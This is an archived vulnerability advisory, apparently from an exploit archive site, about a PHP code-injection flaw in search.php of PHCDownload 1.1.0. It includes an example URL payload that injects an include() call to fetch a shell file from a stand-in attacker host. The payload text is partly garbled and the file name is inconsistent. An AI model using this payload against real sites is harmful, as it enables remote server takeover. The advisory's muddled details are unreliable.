AOH :: HP Unsorted P :: VA2664.HTM

PHCDownload 1.1.0 Vulnerabilities



PHCDownload 1.1.0 Vulnerabilities
PHCDownload 1.1.0 Vulnerabilities



A file content management and manipulation system unlike any other available on the market today, with unique innovations, tools, and design, customising and producing your database is made easy.
PHCDownload has been designed for integration into existing websites with its highly customisable interface and editable language file system.

Vendor: http://www.phpcredo.com
Version: 1.1.0 and older
Vuls file: seach.php
Descripton: It is like remote file inclusion but you can run PHP code browser address. I don't know what is called.

Exploit: http://[site]/[path_to_script]/search.php
Input: ">< 

Example: http://[site]/[path_to_script]/search.php?string=">< include("http://attacker_site/SHELL_FILE"); ?> 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.